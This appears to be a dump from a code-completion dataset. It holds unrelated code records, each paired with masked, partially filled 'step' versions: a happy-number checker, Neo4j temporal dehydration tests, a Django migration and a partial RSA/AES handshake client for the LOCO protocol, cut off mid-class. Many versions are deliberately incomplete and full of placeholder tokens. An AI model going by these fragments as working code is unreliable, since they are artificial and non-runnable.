slow, fast = num, num
while True:
slow = find_square_sum(slow) # move one step
fast = find_square_sum(find_square_sum(fast)) # move two steps
if slow == fast: # found the cycle
break
return slow == 1 # see if the cycle is stuck on the number '1'
def find_square_sum(num):
_sum = 0
while (num > 0):
digit = num % 10
_sum += digit * digit
num //= 10
return _sum
print(find_happy_number(23))
print(find_happy_number(12))
|
normal
|
{
"blob_id": "60b5e515c7275bfa0f79e22f54302a578c2f7b79",
"index": 728,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_square_sum(num):\n _sum = 0\n while num > 0:\n digit = num % 10\n _sum += digit * digit\n num //= 10\n return _sum\n\n\n<mask token>\n",
"step-3": "def find_happy_number(num):\n slow, fast = num, num\n while True:\n slow = find_square_sum(slow)\n fast = find_square_sum(find_square_sum(fast))\n if slow == fast:\n break\n return slow == 1\n\n\ndef find_square_sum(num):\n _sum = 0\n while num > 0:\n digit = num % 10\n _sum += digit * digit\n num //= 10\n return _sum\n\n\n<mask token>\n",
"step-4": "def find_happy_number(num):\n slow, fast = num, num\n while True:\n slow = find_square_sum(slow)\n fast = find_square_sum(find_square_sum(fast))\n if slow == fast:\n break\n return slow == 1\n\n\ndef find_square_sum(num):\n _sum = 0\n while num > 0:\n digit = num % 10\n _sum += digit * digit\n num //= 10\n return _sum\n\n\nprint(find_happy_number(23))\nprint(find_happy_number(12))\n",
"step-5": "def find_happy_number(num):\n slow, fast = num, num\n while True:\n slow = find_square_sum(slow) # move one step\n fast = find_square_sum(find_square_sum(fast)) # move two steps\n if slow == fast: # found the cycle\n break\n return slow == 1 # see if the cycle is stuck on the number '1'\n\n\ndef find_square_sum(num):\n _sum = 0\n while (num > 0):\n digit = num % 10\n _sum += digit * digit\n num //= 10\n return _sum\n\nprint(find_happy_number(23)) \nprint(find_happy_number(12))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset
(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716000,
'Europe/Stockholm'))
@pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(
'2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (
1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 *
24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((
1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.
Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=
'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,
'Europe/London'))))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b'i', *fields))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset
(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
def test_native_date_time_fixed_negative_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716000,
'Europe/Stockholm'))
@pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(
'2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (
1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 *
24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((
1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.
Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=
'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,
'Europe/London'))))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b'i', *fields))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
<|reserved_special_token_0|>
def test_native_date_time_fixed_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(60))
assert_transforms(dt, Structure(b'I', 1539340661, 474716000, 3600))
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset
(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
def test_native_date_time_fixed_negative_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716000,
'Europe/Stockholm'))
@pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(
'2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (
1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 *
24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((
1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.
Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=
'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,
'Europe/London'))))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b'i', *fields))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
def test_date_time_fixed_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset(60)
)
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_native_date_time_fixed_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(60))
assert_transforms(dt, Structure(b'I', 1539340661, 474716000, 3600))
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')
assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset
(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
def test_native_date_time_fixed_negative_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.
FixedOffset(-60))
assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))
def test_pandas_date_time_fixed_negative_offset(self, assert_transforms):
dt = pd.Timestamp('2018-10-12T11:37:41.474716862-0100')
assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))
def test_date_time_zone_id(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716862,
'Europe/Stockholm'))
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone('Europe/Stockholm').localize(dt)
assert_transforms(dt, Structure(b'i', 1539337061, 474716000,
'Europe/Stockholm'))
@pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(
'2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (
1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 *
24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((
1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.
Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=
'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,
'Europe/London'))))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b'i', *fields))
<|reserved_special_token_1|>
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [https://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import pandas as pd
import pytest
import pytz
from neo4j._codec.hydration.v2 import HydrationHandler
from neo4j._codec.packstream import Structure
from neo4j.time import DateTime
from ..v1.test_temporal_dehydration import (
TestTimeDehydration as _TestTemporalDehydrationV1,
)
class TestTimeDehydration(_TestTemporalDehydrationV1):
@pytest.fixture
def hydration_handler(self):
return HydrationHandler()
def test_date_time_fixed_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862,
pytz.FixedOffset(60))
assert_transforms(
dt,
Structure(b"I", 1539340661, 474716862, 3600)
)
def test_native_date_time_fixed_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716,
pytz.FixedOffset(60))
assert_transforms(
dt,
Structure(b"I", 1539340661, 474716000, 3600)
)
def test_pandas_date_time_fixed_offset(self, assert_transforms):
dt = pd.Timestamp("2018-10-12T11:37:41.474716862+0100")
assert_transforms(dt, Structure(b"I", 1539340661, 474716862, 3600))
def test_date_time_fixed_negative_offset(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862,
pytz.FixedOffset(-60))
assert_transforms(
dt,
Structure(b"I", 1539347861, 474716862, -3600)
)
def test_native_date_time_fixed_negative_offset(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716,
pytz.FixedOffset(-60))
assert_transforms(
dt,
Structure(b"I", 1539347861, 474716000, -3600)
)
def test_pandas_date_time_fixed_negative_offset(self, assert_transforms):
dt = pd.Timestamp("2018-10-12T11:37:41.474716862-0100")
assert_transforms(dt, Structure(b"I", 1539347861, 474716862, -3600))
def test_date_time_zone_id(self, assert_transforms):
dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862)
dt = pytz.timezone("Europe/Stockholm").localize(dt)
# offset should be UTC+2 (7200 seconds)
assert_transforms(
dt,
Structure(b"i", 1539337061, 474716862, "Europe/Stockholm")
)
def test_native_date_time_zone_id(self, assert_transforms):
dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)
dt = pytz.timezone("Europe/Stockholm").localize(dt)
# offset should be UTC+2 (7200 seconds)
assert_transforms(
dt,
Structure(b"i", 1539337061, 474716000, "Europe/Stockholm")
)
@pytest.mark.parametrize(("dt", "fields"), (
(
pd.Timestamp("2018-10-12T11:37:41.474716862+0200",
tz="Europe/Stockholm"),
(1539337061, 474716862, "Europe/Stockholm"),
),
(
# 1972-10-29 02:00:01.001000001+0100 pre DST change
pd.Timestamp((1032 * 24 + 2) * 3600 * 1000000000 + 1001000001,
tz="Europe/London"),
((1032 * 24 + 2) * 3600 + 1, 1000001, "Europe/London"),
),
(
# 1972-10-29 02:00:01.001000001+0000 post DST change
pd.Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001,
tz="Europe/London"),
((1032 * 24 + 1) * 3600 + 1, 1000001, "Europe/London"),
)
))
def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):
assert_transforms(dt, Structure(b"i", *fields))
|
flexible
|
{
"blob_id": "5b33615e1890631bac68801310e4b606ac41cb13",
"index": 1340,
"step-1": "<mask token>\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n <mask token>\n <mask token>\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset\n (-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n <mask token>\n <mask token>\n <mask token>\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716000,\n 'Europe/Stockholm'))\n\n @pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(\n '2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (\n 1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 * \n 24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((\n 1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.\n Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=\n 'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,\n 'Europe/London'))))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b'i', *fields))\n",
"step-2": "<mask token>\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n <mask token>\n <mask token>\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset\n (-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n\n def test_native_date_time_fixed_negative_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))\n <mask token>\n <mask token>\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716000,\n 'Europe/Stockholm'))\n\n @pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(\n '2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (\n 1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 * \n 24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((\n 1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.\n Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=\n 'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,\n 'Europe/London'))))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b'i', *fields))\n",
"step-3": "<mask token>\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n <mask token>\n\n def test_native_date_time_fixed_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(60))\n assert_transforms(dt, Structure(b'I', 1539340661, 474716000, 3600))\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset\n (-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n\n def test_native_date_time_fixed_negative_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))\n <mask token>\n <mask token>\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716000,\n 'Europe/Stockholm'))\n\n @pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(\n '2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (\n 1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 * \n 24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((\n 1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.\n Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=\n 'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,\n 'Europe/London'))))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b'i', *fields))\n",
"step-4": "<mask token>\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n\n def test_date_time_fixed_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset(60)\n )\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_native_date_time_fixed_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(60))\n assert_transforms(dt, Structure(b'I', 1539340661, 474716000, 3600))\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862+0100')\n assert_transforms(dt, Structure(b'I', 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862, pytz.FixedOffset\n (-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n\n def test_native_date_time_fixed_negative_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716, pytz.\n FixedOffset(-60))\n assert_transforms(dt, Structure(b'I', 1539347861, 474716000, -3600))\n\n def test_pandas_date_time_fixed_negative_offset(self, assert_transforms):\n dt = pd.Timestamp('2018-10-12T11:37:41.474716862-0100')\n assert_transforms(dt, Structure(b'I', 1539347861, 474716862, -3600))\n\n def test_date_time_zone_id(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716862,\n 'Europe/Stockholm'))\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone('Europe/Stockholm').localize(dt)\n assert_transforms(dt, Structure(b'i', 1539337061, 474716000,\n 'Europe/Stockholm'))\n\n 
@pytest.mark.parametrize(('dt', 'fields'), ((pd.Timestamp(\n '2018-10-12T11:37:41.474716862+0200', tz='Europe/Stockholm'), (\n 1539337061, 474716862, 'Europe/Stockholm')), (pd.Timestamp((1032 * \n 24 + 2) * 3600 * 1000000000 + 1001000001, tz='Europe/London'), ((\n 1032 * 24 + 2) * 3600 + 1, 1000001, 'Europe/London')), (pd.\n Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001, tz=\n 'Europe/London'), ((1032 * 24 + 1) * 3600 + 1, 1000001,\n 'Europe/London'))))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b'i', *fields))\n",
"step-5": "# Copyright (c) \"Neo4j\"\n# Neo4j Sweden AB [https://neo4j.com]\n#\n# This file is part of Neo4j.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport datetime\n\nimport pandas as pd\nimport pytest\nimport pytz\n\nfrom neo4j._codec.hydration.v2 import HydrationHandler\nfrom neo4j._codec.packstream import Structure\nfrom neo4j.time import DateTime\n\nfrom ..v1.test_temporal_dehydration import (\n TestTimeDehydration as _TestTemporalDehydrationV1,\n)\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n\n def test_date_time_fixed_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862,\n pytz.FixedOffset(60))\n assert_transforms(\n dt,\n Structure(b\"I\", 1539340661, 474716862, 3600)\n )\n\n def test_native_date_time_fixed_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716,\n pytz.FixedOffset(60))\n assert_transforms(\n dt,\n Structure(b\"I\", 1539340661, 474716000, 3600)\n )\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp(\"2018-10-12T11:37:41.474716862+0100\")\n assert_transforms(dt, Structure(b\"I\", 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862,\n pytz.FixedOffset(-60))\n assert_transforms(\n dt,\n Structure(b\"I\", 1539347861, 474716862, -3600)\n 
)\n\n def test_native_date_time_fixed_negative_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716,\n pytz.FixedOffset(-60))\n assert_transforms(\n dt,\n Structure(b\"I\", 1539347861, 474716000, -3600)\n )\n\n def test_pandas_date_time_fixed_negative_offset(self, assert_transforms):\n dt = pd.Timestamp(\"2018-10-12T11:37:41.474716862-0100\")\n assert_transforms(dt, Structure(b\"I\", 1539347861, 474716862, -3600))\n\n def test_date_time_zone_id(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862)\n dt = pytz.timezone(\"Europe/Stockholm\").localize(dt)\n # offset should be UTC+2 (7200 seconds)\n assert_transforms(\n dt,\n Structure(b\"i\", 1539337061, 474716862, \"Europe/Stockholm\")\n )\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone(\"Europe/Stockholm\").localize(dt)\n # offset should be UTC+2 (7200 seconds)\n assert_transforms(\n dt,\n Structure(b\"i\", 1539337061, 474716000, \"Europe/Stockholm\")\n )\n\n @pytest.mark.parametrize((\"dt\", \"fields\"), (\n (\n pd.Timestamp(\"2018-10-12T11:37:41.474716862+0200\",\n tz=\"Europe/Stockholm\"),\n (1539337061, 474716862, \"Europe/Stockholm\"),\n ),\n (\n # 1972-10-29 02:00:01.001000001+0100 pre DST change\n pd.Timestamp((1032 * 24 + 2) * 3600 * 1000000000 + 1001000001,\n tz=\"Europe/London\"),\n ((1032 * 24 + 2) * 3600 + 1, 1000001, \"Europe/London\"),\n ),\n (\n # 1972-10-29 02:00:01.001000001+0000 post DST change\n pd.Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001,\n tz=\"Europe/London\"),\n ((1032 * 24 + 1) * 3600 + 1, 1000001, \"Europe/London\"),\n )\n ))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b\"i\", *fields))\n",
"step-ids": [
6,
7,
8,
11,
13
]
}
|
[
6,
7,
8,
11,
13
] |
# Generated by Django 2.1.3 on 2019-01-02 12:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('leasing', '0037_make_lease_basis_of_rent_archivable'),
]
operations = [
migrations.AddField(
model_name='invoicepayment',
name='filing_code',
field=models.CharField(blank=True, max_length=35, null=True, verbose_name='Name'),
),
]
|
normal
|
{
"blob_id": "8cd290dc1e682222c97172a0f23e5b93c54838a7",
"index": 2201,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('leasing', '0037_make_lease_basis_of_rent_archivable')]\n operations = [migrations.AddField(model_name='invoicepayment', name=\n 'filing_code', field=models.CharField(blank=True, max_length=35,\n null=True, verbose_name='Name'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('leasing', '0037_make_lease_basis_of_rent_archivable')]\n operations = [migrations.AddField(model_name='invoicepayment', name=\n 'filing_code', field=models.CharField(blank=True, max_length=35,\n null=True, verbose_name='Name'))]\n",
"step-5": "# Generated by Django 2.1.3 on 2019-01-02 12:08\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('leasing', '0037_make_lease_basis_of_rent_archivable'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='invoicepayment',\n name='filing_code',\n field=models.CharField(blank=True, max_length=35, null=True, verbose_name='Name'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class V2SLClient:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(
padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))
handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2
) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) ->bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv))
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data
return enc_pkt
<|reserved_special_token_0|>
def send(self, data: bytes, split=2048) ->List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes + split]))
sentbytes += split
return segments
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class V2SLClient:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(
padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))
handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2
) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) ->bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv))
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data
return enc_pkt
def _recv(self) ->bytes:
if len(self._readbuf) < 4:
return None
enc_len, = struct.unpack('<I', self._readbuf[:4])
if len(self._readbuf[4:]) < enc_len:
return None
dec = self._aes.decryptor()
data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()
del self._readbuf[:4 + enc_len]
iv = data[:16]
return data[16:]
def send(self, data: bytes, split=2048) ->List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes + split]))
sentbytes += split
return segments
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class V2SLClient:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
